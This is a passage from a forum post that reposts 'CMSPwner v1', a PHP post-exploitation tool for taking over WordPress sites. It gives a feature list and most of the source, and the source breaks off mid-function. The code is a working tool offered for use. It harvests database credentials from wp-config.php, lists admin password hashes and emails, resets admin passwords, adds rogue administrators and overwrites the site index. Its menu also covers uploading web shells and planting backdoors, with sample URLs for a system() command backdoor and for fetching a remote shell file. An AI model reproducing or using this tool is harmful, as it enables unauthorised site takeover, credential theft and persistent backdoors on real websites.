Istifadəçi
2012-08-13 08:04 GMT
Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver :
Rep Sayı : 25
Indi Saytda :
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :
Kod:
#########
# Script Title: CMSPwner
# Version: 1.0 Beta
# Date: 02/08/12
# Script Author: Xt3mP
# Home: http://xt3mp.mx
# For: http://r00tw0rm.com
# Contact: xt3mp[at]null[dot]com
# User: Xt3mP
# Pass: root
# _____ _____ _____ _____
# | | | __| _ |_ _ _ ___ ___ ___
# | --| | | |__ | __| | | | | -_| _|
# |_____|_|_|_|_____|__| |_____|_|_|___|_|
#
#########
.+--==[0x00 - About]>.
CMSPwner is a PHP script created with the intention to take
completely any cms control. This version only have a Wordpress
module, and it's Beta version, so it's probably has errors.
-+--==[0x01 - Demostration]>.
URL: http://www.youtube.com/watch?v=Y8gqHpw4DMQ
.+--==[0x02 - Menu]>.
[+]Login
[-]Authentication: Requires user credentials (non wordpress).
[+]SQL data
[-]SQL Information: Option to take automatically the config in config.php file.
[+]Menu
[-]Home:
*Contains most important Wordpress information.
[-]Logout:
*Log out of the script.
[-]Self Remove:
*Delete completly the script.
[-]About:
*Contains information about the author.
[+]Admin
[-]Admin List:
*Contains all Administrators users with login, hash and mail.
[-]Reset Adm Pass:
*Module to reset any administrator user password.
[-]Add New Admin:
*Module to add a new administrator.
[+]Change Index
[-]Main [fopen]:
*Module to change -WORDPRESS MAIN INDEX- (not theme index).
[-]Theme [cURL]:
*Module to change -WORDPRESS THEME INDEX- (user credentials required).
[-]Theme [fopen]: Module to change -WORDPRESS THEME INDEX- (no user credentials required).
[+]Shell
[-]Upload:
*Module to upload shell.
[-]Make [themes]:
*Module to create shell in themes' path.
[-]Make [plugins]:
*Module to create shell in plugin' path.
[+]Backdoor
[-]Active Theme:
*Module to make a backdoor in any theme.
[-]Active Plugin:
*Module to make a backdoor in any plugin.
[>]Types:
*system(): Execute commands, example:
http://site/wp-content/x/file.php?active=true&cmd=ls
*File Downloader: Download file and make shell, example:
http://site/wp-content/x/file.php?
active=true&filename=SHELL.PHP&externalfile=http://web/shell.txt
.+--==[0x03 - Issues]>.
[+]Maybe you would have problems with permissions.
So, you can edit .htaccess or chmod file in question.
[+]Problem with magic_quotes and stripslashes, check what content you would post.
.+--==[0x04 - Source]>.
<?php
#########
# Script Title: CMSPwner v1 Wordpress Version
# Version: 1.0 Beta
# Date: 02/08/12
# Script Author: Xt3mP
# Home: http://xt3mp.mx
# For: http://r00tw0rm.com
# Contact: xt3mp[at]null[dot]com
# _____ _____ _____ _____
# | | | __| _ |_ _ _ ___ ___ ___
# | --| | | |__ | __| | | | | -_| _|
# |_____|_|_|_|_____|__| |_____|_|_|___|_|
#
#########
session_start();
$authUser = 'Xt3mP';
$authPass = '63a9f0ea7bb98050796b649e85481845';
function checkTable($dbName, $dbPref)
{
$query = mysql_query('SHOW TABLES FROM '.$dbName) or die(mysql_error());
$allowedTables = array($dbPref.'options', $dbPref.'users', $dbPref.'usersmeta');
$counter = 0;
while($table = mysql_fetch_array($query))
{
if(in_array($table[0], $allowedTables))
$counter++;
}
if($counter != 2)
return false;
else
return true;
}
function getInfo($pref, $optionName)
{
$data = mysql_fetch_object(mysql_query('SELECT option_value FROM '.$pref.'options WHERE
option_name="'.$optionName.'"'));
return $data->option_value;
}
function getVersion($url)
{
$source = file_get_contents($url);
$data = preg_match("/<meta name=\"generator\" content=\"WordPress (.*)\" \/>/", $source,
$version);
return $version[1];
}
function getTotalAdmins($pref)
{
$adms = @mysql_num_rows(@mysql_query('SELECT user_id FROM '.$pref.'usermeta WHERE
meta_value=10'));
return $adms;
}
function getAdmins($pref, $type = 'name')
{
$adm = @mysql_query('SELECT user_id FROM '.$pref.'usermeta WHERE meta_value=10');
while($admId = @mysql_fetch_object($adm))
{
if($type == 'name')
{
$admData = @mysql_fetch_object(@mysql_query('SELECT user_login, user_nicename
FROM '.$pref.'users WHERE ID='.$admId->user_id));
$option .= '<option value="'.$admId->user_id.'">'.$admData->user_login.'['.
$admData->user_nicename.']</option>';
}
else
{
$class = ($number == '0') ? 'dark-green' : 'light-green';
$admData = @mysql_fetch_object(@mysql_query('SELECT user_login, user_pass,
user_email FROM '.$pref.'users WHERE ID='.$admId->user_id));
$option .= '<tr class="'.$class.'"><td>'.$admData->user_login.'</td><td>'.
$admData->user_pass.'</td><td>'.$admData->user_email.'</td></tr>';
$number = ($number == '0') ? '1' : '0';
}
}
if($type == 'name')
return $option;
else
return '<table width="100%" align="center"><tr
class="header"><td>User</td><td>Pass</td><td>Mail</td></tr>'.$option.'</table>';
}
function updateAdmin($pref, $admUser, $admPass)
{
$newPass = md5($admPass);
$update = @mysql_query('UPDATE '.$pref.'users SET user_pass="'.$newPass.'" WHERE ID='.$admUser);
if(!$update)
return false;
else
return true;
}
function getAdminById($pref, $admId)
{
$admData = @mysql_fetch_object(@mysql_query('SELECT user_login FROM '.$pref.'users WHERE ID='.
$admId));
return $admData->user_login;
}
function checkUser($pref, $admUser)
{
$adm = @mysql_num_rows(@mysql_query('SELECT user_login FROM '.$pref.'users WHERE user_login="'.
$admUser.'"'));
if($adm > 0)
return false;
else
return true;
}
function addAdminUser($pref, $admUser, $admPass)
{
$insert = @mysql_query('INSERT INTO '.$pref.'users (user_login, user_pass, user_nicename,
user_email) values ("'.$admUser.'", "'.md5($admPass).'", "'.$admUser.'", "'.$admUser.'@'.
$admUser.'.com")');
if(!$insert)
{
return false;
}
else
$id = @mysql_fetch_object(@mysql_query('SELECT ID FROM '.$pref.'users WHERE
user_login="'.$admUser.'"'));
$insert = mysql_query('INSERT INTO '.$pref.'usermeta (user_id, meta_key, meta_value)
values ('.$id->ID.', "wp_capabilities", "a:1:{s:13:\"administrator\";s:1:\"1\";}")') or die(mysql_error
());
$insert = mysql_query('INSERT INTO '.$pref.'usermeta (user_id, meta_key, meta_value)
values ('.$id->ID.', "wp_user_level", "10")') or die(mysql_error());
return true;
}
function checkLogin($wpUrl, $wpUser, $wpPass)
{
$fields = 'log='.$wpUser.'&pwd='.$wpPass.'&wp-submit=Acceder';
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0a2)
Gecko/20111014 Firefox/9.0a2');
curl_setopt($ch, CURLOPT_AUTOREFERER, false);
curl_setopt($ch, CURLOPT_REFERER, $wpUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $wpUrl.'/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$data = curl_exec($ch);
curl_close($ch);
if(strstr($data, '<strong>ERROR</strong>'))
return false;
else
return true;
}
function sourceIndex($wpUrl, $theme)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.$theme);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_USERAGENT, 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0a2)
Gecko/20111014 Firefox/9.0a2');
curl_setopt($ch, CURLOPT_AUTOREFERER, false);
curl_setopt($ch, CURLOPT_REFERER, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.
$theme);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function changeIndex($wpUrl, $wpCont, $theme, $wpnonce)
{
$ch = curl_init();
$fields = '_wpnonce='.$wpnonce.'&newcontent='.urlencode
($wpCont).'&action=update&file=index.php&theme='.$theme.'&scrollto=0&submit=Actualizar Archivo';
curl_setopt($ch, CURLOPT_URL, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.$theme);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_USERAGENT, 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0a2)
Gecko/20111014 Firefox/9.0a2');
curl_setopt($ch, CURLOPT_AUTOREFERER, false);
curl_setopt($ch, CURLOPT_REFERER, $wpUrl.'/wp-admin/theme-editor.php?file=index.php&theme='.
$theme);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$data = curl_exec($ch);
curl_close($ch);
return true;
}
function getThemes()
{
$themes = scandir('./wp-content/themes/');
foreach($themes as $theme)
{
if($theme != '.' && $theme != '..' && is_dir('./wp-content/themes/'.$theme))
{
$realThemes .= '<option value="'.$theme.'">'.$theme.'</option>';
}
}
return $realThemes;
}
function getPlugins()
{
$plugins = scandir('./wp-content/plugins/');
foreach($plugins as $plugin)
{
if($plugin != '.' && $plugin != '..' && is_dir('./wp-content/plugins/'.$plugin))
{
$pluginData = pathinfo('./wp-content/plugins/'.$plugin);
$pluginPath = $plugin;
if(!is_dir('./wp-content/plugins/'.$plugin))
{
$pluginPath = '/';
$plugin = $pluginData['filename'];
}
$realPlugins .= '<option value="'.$pluginPath.'">'.$plugin.'</option>';
}
}
return $realPlugins.'<option value="/">/</option>';
}
function getInstalledPlugins($wpUrl, $plugins, $home = false)
{
$data = preg_match("/a:(.*):{/", $plugins, $a);
for($i = 0; $i < $a[1]; $i++)
{
$c = $a[1] - 1;
if($i != $c)
{
$next = $i + 1;
$pat = "/i:$i;s:[0-9]*:\"(.*)\";i:$next/";
}else{
if($a[1] == 1)
$pat = "/{i:$i;s:[0-9]*:\"(.*)\";}/";
else
$pat = "/;i:$i;s:[0-9]*:\"(.*)\";/";
}
$datas = preg_match($pat, $plugins, $b);
$pluginsc .= (!$home) ? '<a href="'.$wpUrl.'/wp-content/plugins/'.$b[1].'"
target="_blank">'.$b[1].'</a><br />' : '<option value="'.$b[1].'">'.$b[1].'</option>';
}
return (!$home) ? substr($pluginsc, 0, strlen($pluginsc) - 6) : $pluginsc;
}
?>
<!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CMSPwner v1 [WP Version]</title>
<style
type="text/css">html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acrony
m,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,
dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canv
as,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,a
udio,video{border:0;font:inherit;font-size:100%;margin:0;padding:0;vertical-align:baseline}
article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-
height:1}ol,ul{list-style:none}blockquote,q{quotes:none}
blockquote:before,blockquote:after,q:before,q:after{content:none}table{border-collapse:collapse;border-
spacing:0}</style>
<style type="text/css">body{background-color:#2b2b2b;color:#828282;font-family:"Courier New", Courier,
monospace;font-size:13px;font-weight:700;line-height:1em}div#container{width:600px}div#container
fieldset{background-color:#FBFBFB;border:1px dashed #000;padding:5px;text-align:justify}hr{background-
color:#000;color:#000}div#container legend{background-color:#FFF;border:1px dashed
#000;color:#000;padding:5px}fieldset#login .a{width:200px}div#container input,div#container
select,div#container textarea{-moz-border-radius:3px;-webkit-border-radius:3px;background-
color:#333;border:1px dashed #000;border-radius:3px;color:#FFF;font-family:"Courier New", Courier,
monospace;font-weight:700;padding:5px;text-align:center;width:148px}div#container textarea
{resize:none;width:83%}div#container input:hover,div#container input:focus{font-style:normal}
div#container input[type=submit]:hover{background-color:#888;cursor:pointer;text-shadow:1px 1px 1px
#999}div#container .error,div#container .success{background-color:#ff4040;border:1px dashed
red;color:#FFF;float:left;margin-bottom:5px;padding:5px;width:100%!important}div#container .success
{background-color:#49A349;border:1px dashed #002E00}div#container .menu{border-bottom:1px dashed
#000;float:left;font-size:14px;margin-bottom:5px;padding-bottom:5px;text-align:center;width:100%}.data
{float:left;width:98%}.menu ul li{float:left;height:10px;width:100px}.menu ul li ul{background-
color:#FBFBFB;border:1px dashed #000;border-top:none;display:none;float:left;height:auto;margin-
top:2px;position:relative;width:130px}.menu ul li:hover ul{display:block}.menu ul li ul li
{background:#CCC;float:left;height:10px;padding:5px 0 5px 2px;text-align:left;width:130px}.menu ul
li.nonse{float:left;width:20px}div#sql_data,div#data{border-top:1px dashed #000;margin-top:5px;padding-
top:5px}div#sql_data label,div#data label{float:left;margin-right:5px;padding:8px 0;text-
align:right;width:60px}div#container .clear{float:left;width:100%}div#sql_data input[type=text],div#data
input[type=text],div#data select,div#data textarea{margin-right:5px}select{text-align:center}
div#container a{color:#111;text-decoration:none}div#container a:hover{color:#191919;text-
decoration:underline}div#data{border:none}div#info{border-bottom:1px dashed #000;padding-bottom:5px}
table,td,tr{padding:5px;text-align:center}.header{background-color:#000;color:#FFF}.light-green,.dark-
green{background-color:#FCFCFC;color:#000}div#container input[type=submit],.dark-green{background-
color:#666}div#sql_data input[type=submit],div#data input[type=submit],div#data select{width:160px}
div#container .get_config{border-top:1px dashed #000;margin-top:5px;padding-top:5px;text-align:center}
div#container .success a,div#container .success a:hover,.dark-green{color:#FFF}</style>
<script src="http://code.jquery.com/jquery-1.7.2.min.js"></script>
<script>$(function(){windowsHeight=$(window).height();windowsWidth=$(window).width();div=
$('#container');divHeight=div.height();divWidth=div.width();up=windowsHeight/2.3-
(divHeight/2);left=windowsWidth/2-(divWidth/2);$("#container").css("margin-top",up);$("#container").css
("margin-left",left);function putValue(fieldId,newValue,defaultValue){if($("#"+fieldId).val()
==defaultValue){$("#"+fieldId).val(newValue)}}$("#user").focusin(function(){putValue
("user","","User")});$("#user").focusout(function(){putValue("user","User","")});$("#pass").focusin
(function(){putValue("pass","","********")});$("#pass").focusout(function(){putValue
("pass","********","")});$("#db_srvr").focusin(function(){putValue("db_srvr","","localhost")});
$("#db_srvr").focusout(function(){putValue("db_srvr","localhost","")});$("#db_user").focusin(function()
{putValue("db_user","","root")});$("#db_user").focusout(function(){putValue("db_user","root","")});
$("#db_pass").focusin(function(){putValue("db_pass","","root")});$("#db_pass").focusout(function()
{putValue("db_pass","root","")});$("#db_name").focusin(function(){putValue("db_name","","wp_db")});
$("#db_name").focusout(function(){putValue("db_name","wp_db","")});$("#db_pref").focusin(function()
{putValue("db_pref","","wp_")});$("#db_pref").focusout(function(){putValue("db_pref","wp_","")});
$("#new_pass").focusin(function(){putValue("new_pass","","new_pass")});$("#new_pass").focusout(function
(){putValue("new_pass","new_pass","")});$("#new_user").focusin(function(){putValue
("new_user","","Admin2")});$("#new_user").focusout(function(){putValue("new_user","Admin2","")});
$("#wp_url").focusin(function(){putValue("wp_url","","http://site.com/wp")});$("#wp_url").focusout
(function(){putValue("wp_url","http://site.com/wp","")});$("#shell_name").focusin(function(){putValue
("shell_name","","shell.php")});$("#shell_name").focusout(function(){putValue
("shell_name","shell.php","")})});</script>
</head>
<body>
<div id="container">
<div class="logo">
<pre>
_____ __ __ _____ _____ __
X / ____| \/ |/ ____| __ \ /_ |X
t| | | \ / | (___ | |__) |_ ___ __ ___ _ __ __ _| |t
3| | | |\/| |\___ \| ___/\ \ /\ / / '_ \ / _ \ '__| \ \ / / |3
m| |____| | | |____) | | \ V V /| | | | __/ | \ V /| |m
P \_____|_| |_|_____/|_| \_/\_/ |_| |_|\___|_| t00l \_/ |_|P
</pre>
</div>
<form action="" method="POST" enctype="multipart/form-data">
<?php
if(!$_SESSION['logged']):
?>
<fieldset id="login">
<legend>CMSPwner v1 - Login</legend>
<?php
$showLogin = true;
if(isset($_POST['login'])):
$user = $_POST['user'];
$pass = $_POST['pass'];
if($user != $authUser or md5($pass) != $authPass):
echo '<div class="error">Bad username or
password</div>';
else:
$showLogin = false;
$_SESSION['logged'] = true;
$_SESSION['user'] = $user;
echo '<div class="success">Welcome '.$user.'</div>';
echo '<META HTTP-EQUIV="refresh" CONTENT="2; url=?">';
endif;
endif;
if($showLogin):
?>
<input type="text" id="user" name="user" value="User"
class="a"/>
<input type="password" id="pass" name="pass" value="********"
class="a"/>
<input type="submit" name="login" value="Access" />
<?php
endif;
?>
</fieldset>
<?php
else:
?>
<fieldset>
<?php
if(!$_SESSION['sqlCredentials']):
?>
<legend>CMSPwner v1 - SQL Credentials</legend>
This system requires SQL credentials to work correctly. Please
make sure that your credentials are correct.<br />
<?php
$showForm = true;
if($_GET['s3ct10n'] == 'getconfig'):
if(isset($_POST['get_config'])):
$configContent = @file_get_contents('./wp-
config.php');
if(!$configContent):
echo '<div class="error">Can\'t
open/found wp-config.php file</div>';
else:
$data = @preg_match("/define\('DB_HOST',
'(.*)'\);/", $configContent, $host);
$data = @preg_match("/define\('DB_USER',
'(.*)'\);/", $configContent, $user);
$data = @preg_match("/define
\('DB_PASSWORD', '(.*)'\);/", $configContent, $pass);
$data = @preg_match("/define\('DB_NAME',
'(.*)'\);/", $configContent, $name);
$data = @preg_match("/table_prefix =
'(.*)';/", $configContent, $pref);
$_SESSION['dbSrvr'] = $host[1];
$_SESSION['dbUser'] = $user[1];
$_SESSION['dbPass'] = $pass[1];
$_SESSION['dbName'] = $name[1];
$_SESSION['dbPref'] = $pref[1];
$showForm = false;
echo '<div class="success">Configuration
obtained correctly</div>';
echo '<META HTTP-EQUIV="refresh"
CONTENT="2; url=?">';
endif;
endif;
if($showForm):
$file = basename($_SERVER['PHP_SELF']);
?>
<div class="get_config" style="text-
align:left;">You need put this file in same WP path:</div>
<div id="sql_data">
<div
class="clear"><label>File:</label><input type="text" value="<?php echo $file; ?>" disabled="disabled"
/>< Script<br /></div>
<div class="clear"><label></label><input
type="submit" name="get_config" value="Get Config" /></div>
</div>
<?php
endif;
else:
if(isset($_POST['sql'])):
$dbSrvr = $_POST['db_srvr'];
$dbUser = $_POST['db_user'];
$dbPass = $_POST['db_pass'];
$dbName = $_POST['db_name'];
$dbPref = $_POST['db_pref'];
$dbCon = @mysql_connect($dbSrvr, $dbUser,
$dbPass);
$dbSel = @mysql_select_db($dbName, $dbCon);
if(!$dbCon):
echo '<div class="error">Can\'t connect
to the server: '.$dbUser.'@'.$dbSrvr.'</div>';
elseif(!$dbSel):
echo '<div class="error">Can\'t select
DB: '.$dbName.'</div>';
elseif(!checkTable($dbName, $dbPref)):
echo '<div class="error">Can\'t detect
WP tables with Preffix: '.$dbPref.'</div>';
else:
$_SESSION['dbSrvr'] = $dbSrvr;
$_SESSION['dbUser'] = $dbUser;
$_SESSION['dbPass'] = $dbPass;
$_SESSION['dbName'] = $dbName;
$_SESSION['dbPref'] = $dbPref;
$_SESSION['sqlCredentials'] = true;
$showForm = false;
echo '<div class="success">SQL
Credentials accepted correctly</div>';
echo '<META HTTP-EQUIV="refresh"
CONTENT="2; url=?">';
endif;
endif;
if($showForm):
$srvr = (empty($_SESSION['dbSrvr'])) ?
'localhost' : $_SESSION['dbSrvr'];
$user = (empty($_SESSION['dbUser'])) ? 'root' :
$_SESSION['dbUser'];
$pass = (empty($_SESSION['dbPass'])) ? 'root' :
$_SESSION['dbPass'];
$name = (empty($_SESSION['dbName'])) ? 'wp_db' :
$_SESSION['dbName'];
$pref = (empty($_SESSION['dbPref'])) ? 'wp_':
$_SESSION['dbPref'];
?>
<div class="get_config">[<a href="?
s3ct10n=getconfig">Try to get config automatically</a>]</div>
<div id="sql_data">
<div
class="clear"><label>Server:</label><input type="text" id="db_srvr" name="db_srvr" value="<?php echo
$srvr; ?>" />< Insert SQL Server<br /></div>
<div
class="clear"><label>User:</label><input type="text" id="db_user" name="db_user" value="<?php echo
$user; ?>" />< Insert SQL Username<br /></div>
<div
class="clear"><label>Pass:</label><input type="text" id="db_pass" name="db_pass" value="<?php echo
$pass; ?>" />< Insert SQL Password<br /></div>
<div
class="clear"><label>Name:</label><input type="text" id="db_name" name="db_name" value="<?php echo
$name; ?>" />< Insert SQL Database Name<br /></div>
<div
class="clear"><label>Prefix:</label><input type="text" id="db_pref" name="db_pref" value="<?php echo
$pref; ?>" />< Insert Wordpress DB Preffix<br /></div>
<div class="clear"><label></label><input
type="submit" name="sql" value="Check SQL Data" />
</div>
<?php
endif;
endif;
?>
<?php
else:
$dbCon = @mysql_connect($_SESSION['dbSrvr'], $_SESSION
['dbUser'], $_SESSION['dbPass']);
@mysql_select_db($_SESSION['dbName'], $dbCon);
?>
<legend>CMSPwner v1 - System</legend>
<div class="menu">
<ul>
<li>Menu
<ul>
<li><a href="?">Home</a></li>
<li><a href="?
s3ct10n=logout">Logout</a></li>
<li><a href="?
s3ct10n=selfremove">Self Remove</a></li>
<li><a href="?
s3ct10n=about">About</a></li>
</ul>
</li>
<li>Admin
<ul>
<li><a href="?s3ct10n=1">Adm
List</a></li>
<li><a href="?s3ct10n=2">Reset
Adm Pass</a></li>
<li><a href="?s3ct10n=3">Add New
Adm</a></li>
</ul>
</li>
<li>Change Index
<ul>
<li><a href="?s3ct10n=4">Main
[fopen]</a></li>
<li><a href="?s3ct10n=5">Theme
[cURL]</a></li>
<li><a href="?s3ct10n=6">Theme
[fopen]</a></li>
</ul>
</li>
<li>Shell
<ul>
<li><a href="?
s3ct10n=7">Upload</a></li>
<li><a href="?s3ct10n=8">Make
[themes]</a></li>
<li><a href="?s3ct10n=9">Make
[plugins]</a></li>
</ul>
</li>
<li>Backdoor
<ul>
<li><a href="?s3ct10n=10">Active
Theme</a></li>
<li><a href="?s3ct10n=11">Active
Plugin</a></li>
</ul>
</ul>
</div>
<div class="data">
<?php
$s3ct10n = $_GET['s3ct10n'];
switch($s3ct10n):
case '':
?>
WP Version: <?php echo getVersion
(getInfo($_SESSION['dbPref'], 'siteurl')); ?><br />
WP Url: <a href="#"><?php echo getInfo
($_SESSION['dbPref'], 'siteurl'); ?></a><br />
WP Mail: <?php echo getInfo($_SESSION
['dbPref'], 'admin_email'); ?><br />
WP Theme: <a target="_blank" href="<?php
echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-content/themes/<?php echo getInfo($_SESSION
['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION['dbPref'], 'template'); ?></a><br />
WP Active Plugins: <br /><?php echo
getInstalledPlugins(getInfo($_SESSION['dbPref'], 'siteurl'), getInfo($_SESSION['dbPref'],
'active_plugins')); ?><br />
WP Adm Users: <?php echo getTotalAdmins
($_SESSION['dbPref']); ?><br />
WP Blog Charset: <?php echo getInfo
($_SESSION['dbPref'], 'blog_charset'); ?><br />
WP DB Host: <?php echo $_SESSION
['dbSrvr']; ?><br />
WP DB User: <?php echo $_SESSION
['dbUser']; ?><br />
WP DB Pass: <?php echo $_SESSION
['dbPass']; ?><br />
WP DB Server: <?php echo $_SESSION
['dbName']; ?><br />
WP DB Preffix: <?php echo $_SESSION
['dbPref']; ?>
<?php
break;
case 'logout':
$showForm = true;
if(isset($_POST['no'])):
echo '<META HTTP-EQUIV="refresh"
CONTENT="0; url=?">';
elseif(isset($_POST['yes'])):
@session_destroy();
echo '<META HTTP-EQUIV="refresh"
CONTENT="0; url=?">';
endif;
if($showForm):
?>
<div id="info">Logout?</div>
<div id="data">
<div class="clear"
style="text-align: center;"><input type="submit" value="No" name="no" /> - <input type="submit"
value="Yes" name="yes" /></div>
</div>
<?php
endif;
break;
case 'selfremove':
$showForm = true;
if(isset($_POST['no'])):
echo '<META HTTP-EQUIV="refresh"
CONTENT="0; url=?">';
elseif(isset($_POST['yes'])):
@session_destroy();
@unlink(basename($_SERVER
['PHP_SELF']));
echo '<META HTTP-EQUIV="refresh"
CONTENT="0; url=?">';
endif;
if($showForm):
?>
<div id="info">Self remove?
</div>
<div id="data">
<div class="clear"
style="text-align: center;"><input type="submit" value="No" name="no" /> - <input type="submit"
value="Yes" name="yes" /></div>
</div>
<?php
endif;
break;
case 'about':
?>
<div id="info">About</div>
<div id="data">
<pre style="text-align: center;">
.--,-``-. ,-.----.
,--, ,--, ___ / / '. ____ \ / \
|'. \ / .`| ,--.'|_ / ../ ; ,' , `.| : \
; \ `\ /' / ; | | :,' \ ``\ .`- ' ,-+-,.' _ || | .\ :
`. \ / / .' : : ' : \___\/ \ : ,-+-. ; , ||. : |: |
\ \/ / ./.;__,' / \ : | ,--.'|' | ||| | \ :
\ \.' / | | | / / / | | ,', | |,| : . /
\ ; ; :__,'| : \ \ \ | | / | |--' ; | |`-'
/ \ \ \ ' : |__ ___ / : || : | | , | | ;
; /\ \ \ | | '.'| / /\ / :| : | |/ : ' |
./__; \ ; \ ; : ;/ ,,/ ',- .| | |`-' : : :
| : / \ \ ;| , / \ ''\ ; | ;/ | | :
; |/ \ ' | ---`-' \ \ .' '---' `---'.|
`---' `--` `--`-,,-' `---`
</pre>
<pre>
+------------------------------------------------------------------------+
| Website: http://xt3mp.mx |
| Contact: xt3mp[at]null[dot]net |
+------------------------------------------------------------------------+
</pre>
</div>
<?php
break;
case 1:
?>
<div id="info">All Admin users appear
below:</div>
<div id="data"><?php echo getAdmins
($_SESSION['dbPref'], 'list'); ?></div>
<?php
break;
case 2:
$showForm = true;
if(isset($_POST['change_pass'])):
$admUser = $_POST['adminId'];
$admPass = $_POST['admin_pass'];
if(!updateAdmin($_SESSION
['dbPref'], $admUser, $admPass)):
echo '<div
class="error">Can\'t update admin password: Internal error</div>';
else:
$admUser = getAdminById
($_SESSION['dbPref'], $admUser);
$showForm = false;
echo '<div
class="success">Admin password updated correctly: '.$admUser.'::'.$admPass.'</div>';
echo '<META HTTP-
EQUIV="refresh" CONTENT="2; url=?">';
endif;
endif;
?>
<?php
if($showForm):
?>
<div id="info">Select Admin User
and Insert a New Password:</div>
<div id="data">
<div
class="clear"><label>User:</label><select name="adminId"><?php echo getAdmins($_SESSION['dbPref']); ?
></select>< Select Admin User<br /></div>
<div
class="clear"><label>Pass:</label><input type="text" id="new_pass" name="admin_pass" value="new_pass"
/>< Insert New Password<br /></div>
<div
class="clear"><label></label><input type="submit" name="change_pass" value="Change Admin Pass" /></div>
</div>
<?php
endif;
?>
<?php
break;
case 3:
$showForm = true;
if(isset($_POST['add_admin'])):
$admUser = $_POST['admin_user'];
$admPass = $_POST['admin_pass'];
if(!checkUser($_SESSION
['dbPref'], $admUser)):
echo '<div
class="error">Can\'t add new Admin User: '.$admUser.' is in use</div>';
elseif(!addAdminUser($_SESSION
['dbPref'], $admUser, $admPass)):
echo '<div
class="error">Can\'t insert new Admin User: Internal error</div>';
else:
$showForm = false;
echo '<div
class="success">New Admin User inserted correctly: '.$admUser.'::'.$admPass.'</div>';
echo '<META HTTP-
EQUIV="refresh" CONTENT="2; url=?">';
endif;
endif;
?>
<?php
if($showForm):
?>
<div id="info">Insert New Admin
User:</div>
<div id="data">
<div
class="clear"><label>User:</label><input type="text" id="new_user" name="admin_user" value="Admin2" /><
Insert Admin User<br /></div>
<div
class="clear"><label>Pass:</label><input type="text" id="new_pass" name="admin_pass" value="new_pass"
/>< Insert New Password<br /></div>
<div
class="clear"><label></label><input type="submit" name="add_admin" value="Add New Admin" /></div>
</div>
<?php
endif;
?>
<?php
break;
case 4:
$showForm = true;
$indexContent = @file_get_contents
('./index.php');
if(isset($_POST['change_index'])):
$newContent = stripslashes
($_POST['new_content']);
$newIndex = @fopen('index.php',
'w+');
if(!$newIndex):
echo '<div
class="error">Can\'t create new index file</div>';
else:
$showForm = false;
@fwrite($newIndex,
$newContent);
@fclose($newIndex);
echo '<div
class="success">Index updated correctly</div>';
echo '<META HTTP-
EQUIV="refresh" CONTENT="2; url=?">';
endif;
endif;
if($showForm):
?>
<div id="info">Insert New Index
Content (WP Main Index) [fopen]:</div>
<div id="data">
<div
class="clear"><label>Content:</label><textarea name="new_content" style="text-align: left;font-
size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $indexContent; ?
></textarea><br /></div>
<div
class="clear"><label></label><input type="submit" name="change_index" value="Change Index" /></div>
</div>
<?php
endif;
?>
<?php
break;
case 5:
$showForm = true;
$next = false;
if(isset($_POST['change_index'])):
$wpUrl = getInfo($_SESSION
['dbPref'], 'siteurl');
if(substr($wpUrl, -1) == '/')
$wpUrl = substr($wpUrl,
0, strlen($wpUrl) - 1);
$wpUser = $_POST['admin_user'];
$wpPass = $_POST['admin_pass'];
$wpCont = stripslashes($_POST
['new_content']);
if(!checkLogin($wpUrl, $wpUser,
$wpPass)):
echo '<div
class="error">Can\'t login with: '.$wpUser.'::'.$wpPass.'</div>';
else:
$source = sourceIndex
($wpUrl, getInfo($_SESSION['dbPref'], 'template'));
$data = @preg_match
("/<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.*)\" \/></", $source, $wpnonce);
$next = true;
endif;
if($next === false):
elseif($next === true && empty
($wpnonce[1])):
echo '<div
class="error">Can\'t get wp nonce</div>';
elseif(!changeIndex($wpUrl,
$wpCont, getInfo($_SESSION['dbPref'], 'template'), $wpnonce[1])):
echo '<div
class="error">Can\'t update index file</div>';
else:
